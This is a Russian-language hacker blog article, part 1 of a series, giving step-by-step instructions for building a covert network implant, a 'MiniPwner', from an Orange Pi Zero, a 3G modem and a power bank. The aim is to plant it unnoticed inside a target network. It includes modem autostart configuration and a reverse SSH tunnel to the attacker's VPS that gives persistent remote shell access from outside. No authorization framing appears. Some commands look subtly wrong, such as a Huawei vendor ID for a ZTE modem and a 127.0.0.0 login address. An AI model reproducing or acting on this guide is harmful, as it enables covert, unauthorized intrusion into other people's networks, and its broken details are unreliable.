Получаем 100% доступ к сети Часть 1.
B1ACK_GARANTВ этой статье я покажу как сделать такое устройство.
Привет, Анон. Сегодня я расскажу как подготовить устройство, которое позволит получить полный контроль над сетью. Достаточно незаметно разместить MiniPwner и можно удаленно проводить различные атаки. В этой статье я покажу как сделать такое устройство, а в следующей – расскажу об эксплуатации. Вы только вдумайтесь, что незаметно поместив это устройство, можно получить полный контроль над сетью на 24 часа и больше. В зависимости от источника питания.
Что нужно для работы?
- Orange Pi Zero
- Power bank
- USB 3G-модем (я использовал ZTE MF100, но чтобы не проводить дополнительных танцев с бубном смотрите с поддержкой Linux ОС)
- SIM-карта.
- Ethernet-кабель.
- MicroSD-карта.
Шаг 1. Подготовка Orange Pi Zero
Для начала нам необходимо перейти на сайт и скачать операционную систему Armbian Stretch. Далее распаковать архив в папку и записать образ на MicroSD-карту. Об этом есть много информации в интернете. На Windows это можно сделать с помощью утилиты Win32DiskImager. Достаточно выбрать образ и путь и начать запись кнопкой "Write". Выглядит это примерно так.
После этого устанавливаем карту в Orange Pi Zero, подключаем в локальную сеть и подаем питание (желательно это делать через Powerbank или USB hub, чтоб на выходе получить 5В/1А). Ждем некоторое время. Дальше необходимо посмотреть на роутере или просканировать сеть для получения IP-адреса. Подключаемся по SSH. Это можно выполнить, как с отдельного клиента, так и с командной строки. Стандартные данные для авторизации:
Логин root Пароль 1234
После подключения нужно повторно ввести пароль и создать нового юзера. В итоге должно получиться вот так:
Далее перезагружаем плату. Для этого нужно выполнить команду:
reboot
После нового подключения необходимо провести обновление системы с помощью таких команд:
apt-get update apt-get upgrade
Аналогично выполняем перезагрузку и повторно подключаемся. Затем начинается самое интересное.
Шаг 2. Подключение 3G-модема
Модем нам нужен для того, чтоб мы могли получать удаленный доступ к сети, которая не имеет выход в интернет. Таким образом, это позволит нам управлять работой сети с удобного места.
Подключаем модем и устанавливаем необходимые пакеты для работы:
sudo apt-get install usb-modeswitch ppp
Далее необходимо проверить список подключенных устройств. Это можно сделать с помощью команды:
lsusb
Видно, что там есть модем ZTE WCDMA Technologies MSM MF110/MF627/MF636. Далее необходимо изменить настройки:
nano /etc/usb_modeswitch.conf
После открытия в конце документа нужно добавить:
DefaultVendor=0x12d1 DefaultProduct=0x155b MessageContent="55534243123456780000000000000011060000000000000000000000000000" MessageEndpoint=0x01 CheckSuccess=5
Далее перезапускаем модем и смотрим, работает все или нет.
usb_modeswitch -c /etc/usb_modeswitch.conf
Необходимо сделать так, чтобы модем автоматически переходил в нужный режим. Выполняем команду:
nano /etc/rc.local
И перед exit 0 добавляем:
usb_modeswitch -c /etc/usb_modeswitch.conf &
& - этот знак означает, что операция будет выполняться в фоновом режиме. Сохраняем и перезагружаем систему.
Выполним подключение 3G модема
# mkdir ~/usbmodem # cd ./usbmodem # wget http://sourceforge.net/projects/vim-n4n0/files/sakis3g.tar.gz # tar -xzvf sakis3g.tar.gz # sudo chmod +x sakis3g # sudo ./sakis3g --interactive
Далее с помощью интерактивного режима можем выполнить подключение к 3G сетям. Для этого следуем пунктам:
1. Connect with 3G -> 1. USB device -> 1. Mobile Connect -> 1. (internet.mts.ru)
Последний вариант будет выбран, исходя из вашего оператора.
Для автоматического подключения к сети нужно добавить соответствующую команду в /etc/rc.local. Для этого я запустил sakis3g без ключа --interactive, выбрал нужный идентификатор модема и APN. У меня получилось примерно так:
Попробуйте перезагрузить плату командой reboot, далее подключитесь к ней. Нужно проверить работает ли интерфейс модема (нужный интерфейс для 3G ppp0):
Шаг 3. Настройка SSH-туннеля.
После проделанного возникает вопрос: как получить доступ к устройству, если оно находится на охраняемом периметре, подключено к сети за NAT, а мобильный провайдер не выдает "белых" IP? В этом нам поможет дополнительный VPS-сервер и SSH-Туннель.
Для работы я арендовал сервер с внешним IP-адресом, настроил на нем пользователя root и разрешил в фаерволле доступ по SSH. Эти настройки зависят от вашего VPS-провайдера, и гайды обычно можно найти на его сайте.
Сначала выполним на нашей Orange Pi Zero команду:
ssh -f -N <username>@<address> -R 3722:127.0.0.1:22
Подставим вместо <username> - root (или какое имя пользователя вы используете на сервере), вместо <address> его IP. Дальше указываете порты для проброса туннеля. Вас попросит ввести пароль юзера сервера.
После этого вы сможете залогиниться на Orange со своего сервера БЕЗ ИСПОЛЬЗОВАНИЯ его IP-адреса, так как туннель является обратным, то есть инициируется нашим Orange. Логинимся так:
ssh <username>@127.0.0.0 -p 3722
Вместо username у нас будет root, а 3722 и есть выбранный вами порт в предыдущей команде.
Шаг 4. Пожинаем плоды
После подключения получаем вот такой результат. Где можно увидеть базовую информацию об устройстве. Дальше начинается все самое интересное.
Заключение
Это была самая сложная часть. В следующей я расскажу тебе, как можно работать с этой штукой. Например, как поставить nmap, dsniff, tcdump и другие. Все будет упираться только в твои фантазию и потребности. Все это зависит от твоих задач, так как наш Armbian поддерживает достаточно много. На этом все, ждите вторую часть, которая покажет, что умеет наш MiniPwner с Orange PI.